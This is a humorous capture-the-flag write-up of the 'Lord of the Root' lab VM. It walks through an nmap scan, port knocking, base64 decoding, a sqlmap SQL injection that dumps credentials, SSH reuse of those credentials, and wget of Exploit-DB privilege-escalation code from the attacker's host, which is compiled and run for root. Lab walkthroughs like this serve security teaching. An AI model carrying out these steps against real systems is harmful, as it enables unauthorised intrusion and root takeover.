Lord of the root

Welcome to the Lord of the root CTF created by Kooksec and stumbled through by me.

Ok first things first, the chocolate starfish is my man fred durst. Lets get an IP with netdiscover.

Once we have that lets run a full scan on it with nmap

nmap -A -sS -sV -p 1-65535 -T4 192.168.128.20

ok so not much really going on, just port 22 for ssh.

root@kali:~# nmap -A -sS -sV -p 1-65535 -T4 192.168.128.20

Starting Nmap 7.60 ( https://nmap.org ) at 2018-11-29 05:33 EST

Nmap scan report for 192.168.128.20
Host is up (0.00042s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
| 2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
| 256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
|_ 256 34:ec:16:dd:a7:cf:2a:86:45:ec:65:ea:05:43:89:21 (EdDSA)
MAC Address: 08:00:27:AC:E1:23 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.8, Linux 3.16 - 4.6, Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Lets try sshing to that port and see what happens. im going to provide a screen shot cause there is some baller ASCII art on this page that doesn’t format correctly.

root@kali:~# ssh 192.168.128.20
The authenticity of host '192.168.128.20 (192.168.128.20)' can't be established.
ECDSA key fingerprint is SHA256:XzDLUMxo8ifHi4SciYJYj702X3PfFwaXyKOS07b6xd8.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.128.20' (ECDSA) to the list of known hosts.

Easy as 1,2,3
root@192.168.128.20's password:

 

This looks like port knocking, which is the method of security through obscurity, you use ports as a sort of combination lock, accessing certain ports in a particular order unlocks a hidden service/port.

I ran the below commands, and then read the rest of the article and realized i could have scripted it, so, RTFM kids.

root@kali:~# nmap -Pn --host_timeout 201 --max-retries 0 -p 1 192.168.128.20 #knocking port 1


root@kali:~# nmap -Pn --host_timeout 201 --max-retries 0 -p 2 192.168.128.20 #knocking port 2


root@kali:~# nmap -Pn --host_timeout 201 --max-retries 0 -p 3 192.168.128.20 #knocking port 3

After re-scanning i can see there is another port open! an apache web server on port 1337

1337/tcp open http Apache httpd 2.4.7 ((Ubuntu))

I navigate there and success! found a webpage.

Lmao. Ok, lets try the /robots.txt and /index, its the same page, lets inspect.

I found this in the page source, which looks like a base64 encoded string.

<html>
<img src="/images/hipster.jpg" align="middle">
<!--THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh>
</html>

So lets decode with an online decoder because echo x | base64 -d didnt work.

Lzk3ODM0NTIxMC9pbmRleC5waHA= Closer!

Amazing, ok, that also looks like a base64 encoded string, and this time the command worked, so, something to look into later..

root@kali:~# echo Lzk3ODM0NTIxMC9pbmRleC5waHA= | base64 -d
/978345210/index.php

Jackpot, a log in page.

Ok so this looks likes vulnerable to sql injection.

i opened burpsuite to intercept a a request, and then using the sqlmap wizard entered the following commands.

root@kali:~# sqlmap --wizard

[07:02:26] [INFO] starting wizard interface

Please enter full target URL (-u): http://192.168.128.20:1337/978345210/index.php

POST data (--data) [Enter for None]: username=test&password=password&submit=+Login+

Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 2

Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Intermediate
[3] All
> 3

This ran and identified that the database was vulnerable to a time base blind attack. Which then ran and found the following user credentials.

Database: Webapp
Table: Users
[5 entries]
+----+----------+------------------+
| id | username | password |
+----+----------+------------------+
| 1 | frodo | iwilltakethering |
| 2 | smeagol | MyPreciousR00t |
| 3 | aragorn | AndMySword |
| 4 | legolas | AndMyBow |
| 5 | gimli | AndMyAxe |
+----+----------+------------------+

logging in with any of these credentials yields the same, slightly less hilarious each time meme account page.

But! lets try those same login crdedentials for the SSH server…

Frodo did not work but smeagol got us sshed into the box, and some more baller ass ASCII art

doing some basic linux recon i used the uname -a to find out what version, it looks like its using a version of linux ive already privilege escalated on, which is handy.

I found the same privilege escalation exploit here and started a simpleHTTPserver in my home directory with python, then used wget to transfer it to the /tmp folder on the target.

root@kali:~# python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.128.20 - - [07/Dec/2018 02:02:28] "GET /37292.c HTTP/1.1" 200 -
smeagol@LordOfTheRoot:/var/tmp$ wget http://192.168.128.10:8000/37292.c
--2018-12-04 20:17:31-- http://192.168.128.10:8000/37292.c
Connecting to 192.168.128.10:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5119 (5.0K) [text/plain]
Saving to: ‘37292.c’

100%[================================================================================================>] 5,119 --.-K/s in 0s

2018-12-04 20:17:31 (666 MB/s) - ‘37292.c’ saved [5119/5119]

smeagol@LordOfTheRoot:/var/tmp$

After this is compile and execute it. However it failed..

smeagol@LordOfTheRoot:/var/tmp$ gcc 37292.c -o pwned
smeagol@LordOfTheRoot:/var/tmp$ ./pwned
spawning threads
mount #1
mount #2
child threads done
exploit failed
smeagol@LordOfTheRoot:/var/tmp$ whoami
smeagol

I jumped back on exploitDB and eventually found another exploit. 

smeagol@LordOfTheRoot:/var/tmp$ gcc 39166.c -o pwn
smeagol@LordOfTheRoot:/var/tmp$ ./pwn
root@LordOfTheRoot:/var/tmp# id
uid=0(root) gid=1000(smeagol) groups=0(root),1000(smeagol)

this time it executed fine and gave me root access! after navigating to the root folder i found the final flag.

root@LordOfTheRoot:~/Documents# cd /root
root@LordOfTheRoot:/root# pwd
/root
root@LordOfTheRoot:/root# ls
buf buf.c Flag.txt other other.c switcher.py
root@LordOfTheRoot:/root# cat Flag.txt
“There is only one Lord of the Ring, only one who can bend it to his will. And he does not share power.”
– Gandalf
root@LordOfTheRoot:/root#

Great CTF.